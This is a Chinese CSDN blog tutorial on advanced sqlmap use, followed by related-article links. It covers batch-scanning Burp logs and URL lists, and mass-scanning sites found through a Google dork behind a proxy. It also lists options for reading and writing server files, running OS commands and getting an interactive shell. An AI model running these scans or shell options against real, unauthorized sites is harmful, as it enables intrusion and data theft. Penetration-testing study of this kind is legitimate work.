sqlmap高级用法

最新推荐文章于 2023-07-11 16:54:30 发布
最新推荐文章于 2023-07-11 16:54:30 发布
阅读量2.3k 收藏 14
点赞数
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/114882556
版权

一.批量化扫描burp的请求日志

1.打开burp配置项,进行如下修改
在这里插入图片描述
记录所有的request请求,保存在sqlmap目录下的sql.txt中
2.设置浏览器burp代理,访问测试url,查看sql.txt
在这里插入图片描述
3.sqlmap对sql.txt进行扫描
命令:sqlmap.py -l sql.txt --batch -smart
batch:会自动选择yes
smart:启发式快速判断,节约时间
在这里插入图片描述
结果将导出到C盘下的sqlmap目录下的output目录
在这里插入图片描述

二.批量扫描文本中的多个目标

1.在文本中写入要测试的url
在这里插入图片描述
2.sqlmap对url.txt进行扫描
命令:sqlmap.py -m url.txt --dbs
在这里插入图片描述

三.利用正则过滤目标网址

因为扫描burp请求时,有很多的请求我们不需要,并不是我们要扫描的网址,因此需要用正则去过滤
参数:–scope
例如:只想要www开头,.com/.net/.org结尾的网址
Python2 sqlmap.py -l burp.log --scope=”(www)?.target.(com|net|org)”

四.利用谷歌批量扫

命令:
sqlmap -g “inurl:php?id=10 site:.com.cn” --proxy “http://127.0.0.1:1080” --threads 5 --batch --answer “extending=N,follow=N,keep=N,exploit=n” --smart
-g #谷歌搜索
-proxy #代理(挂了ss就直接代理本地)
-threads #线程
-batch #自动回复
-answer “extending=N,follow=N,keep=N,exploit=n” #这个可以对一些特定的问题作出回答,在自动化注入中用
-smart #当有大量目标时,这个就只检查基于错误的注入点
例如:首先用谷歌搜索.php?id=1结尾的URL,然后进行注入测试
Sqlmap.py -g “inurl:\”.php?id=1\””

五.关于文件写入与shell获取

sql-shell #执行指定sql命令 (寻找文件绝对路径)
–sql-query #执行指定的sql语句
–file-read #读取指定文件
–file-write #写入本地文件
(–file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–file-dest #要写入的文件绝对路径
–os-cmd=id #执行系统命令
–os-shell #系统交互shell
–reg-read #读取win系统注册表

参考链接:
https://cloud.tencent.com/developer/article/1076432

番茄酱料
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap高级技巧收集[轉載][收集整理]
07-02
sqlmap,高级sqlmap高级技巧收集[轉載][收集整理] 网络渗透必备
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2004
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
使用sqlmapapi.py批量化扫描实践
kaitoulee
06-19 5472
0x00 前言 sqlmap可谓是sql注入探测的神器,优秀的探测功能可以让任何一个使用者无基础挖掘sql注入。wooyun上关于sqlmap的文章已经有6篇了,都没有科 普sqlmapapi.py。因此我打算分享下这方面的实践。利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试,这样肯定不是理想状态。 sqlmap的作者肯定也察觉到这一点了,默默的开发了sqlmapapi
超详细SQLMap使用攻略及技巧
DXCyber409的博客
08-15 2857
本文转载自:http://www.freebuf.com/sectool/164608.html sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1...
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLMAP高级用法
你在看屏幕的同时,屏幕也在注视着你
12-19 2131
sqlmap高级用法
sqlmap高级使用-tamper脚本使用、os-shell原理等
weixin_46626737的博客
07-11 676
(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
sqlmap扫描信息保存到txt文档
weixin_35752122的博客
01-04 733
如果你想使用 sqlmap 将扫描信息保存到文本文档,你可以使用下面的命令: sqlmap --log-file scan-results.txt -u http://example.com/query?id=1 这会将 sqlmap 的扫描日志保存到名为 "scan-results.txt" 的文本文档中。你可以替换 "http://example.com/query?id=1" 为你想要扫描...
39.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。写文章-CSDN
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
免费开源的SQL注入工具SQLmap.zip
07-18
SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处理潜在的文件系统以及通过带外数据连接执行系统命令等。  访问SQLMAP的官方网站...
MiscSecNotes:有关Web应用程序安全性,渗透测试的一些学习笔记
05-01
MiscSecNotes 此系列文章是本人关于学习 Web/Cloud/Docker 安全、渗透测试、安全建设等时记录的一些笔记,部分原创,部分是对网上文章的理解整理。如果可以找到原始参考链接时则会在文末贴出...php 高级代码审计 php
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
SQLmap使用总结
Alexz__的博客
02-15 3148
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
sqlMap高级用法
魔都虫师的博客
08-19 539
一.介绍 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入 支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 二.基本参数 —update:更新 p
python调用sqlmapapi实现批量扫描网站
weixin_43996007的博客
02-22 4080
python调用sqlmapapi实现批量扫描网站 1、介绍 众所周知,sqlmap是一个非常强大的注入扫描工具。利用它可以自动化检测和利用SQL注入缺陷以达到接管控制网站后台数据库的目的。 但是再强大的工具总会存在一些缺陷的地方——比如每进行一个扫描任务,都需要再次开启一个命令行;使用相同的参数扫描网站时需要多次输入,浪费时间,效率低下。不过好在sqlmap提供了一个强大的api可以弥补这些缺陷。 sqlmapapi分为服务端和客户端,默认端口为8775。使用方法如下: 其中,-p参数可以指定端口号,-
python开发-sqlmapapi接口批量扫描注入
告白的博客
10-22 1570
0x00 sqlmapapi介绍 在sqlmap目录下面还存在一个sqlmapapi.py的程序,sqlmap.py本身具有批量扫描的能力,常见批量扫描有使用-l参数扫描bur代理的日志目标但是扫描多个对象时候,推荐使用sqlmap的api接口,效率更高,sqlmapapi接口有两种使用方式,本地直接使用或者是当与本地不在一起时候,使用客户端与服务端连接使用,今天介绍使用pytohn开发配合sqlmapapi接口批量扫描。 0x01 python开发-sqlmapapi接口 使用接口前先启用sqlmapap
sqlmap使用教程
最新发布
07-27
当然,我可以为您提供关于sqlmap使用的一些基本教程。以下是一些步骤和示例命令,帮助您开始使用sqlmap: 1. 安装sqlmap:您可以从sqlmap官方网站上下载并安装sqlmap。根据您的操作系统,可能需要进行一些特定的配置。 2. 寻找目标:确定您要测试的目标网站或应用程序。确保您已经获得了测试目标的合法授权。 3. 执行基本测试:使用以下命令执行简单的测试: ``` sqlmap -u <目标URL> ``` 这将使用默认选项对目标URL进行基本的SQL注入测试。sqlmap将自动检测可能的注入点,并尝试发现和利用潜在的漏洞。 4. 指定注入点:如果sqlmap未能自动检测到注入点,您可以手动指定注入点。例如,使用以下命令指定注入点为URL参数: ``` sqlmap -u <目标URL> --data=<参数名>=<注入点> ``` 5. 进行高级测试:sqlmap提供了许多选项和参数,可以进行更深入的测试和攻击。您可以使用`-h`命令查看所有可用选项和参数。 例如,使用以下命令指定使用POST方法发送数据,并且在发现注入点后尝试获取数据库中的所有表: ``` sqlmap -u <目标URL> --data=<参数名>=<注入点> --method=POST --tables ``` 6. 更多功能:sqlmap还提供了其他功能,例如获取数据库的列、数据、操作系统访问等。您可以通过查看sqlmap的官方文档来了解更多详细信息。 请记住,在使用sqlmap进行测试时,务必遵守所有适用的法律和道德规范,并仅对您获得授权的目标进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值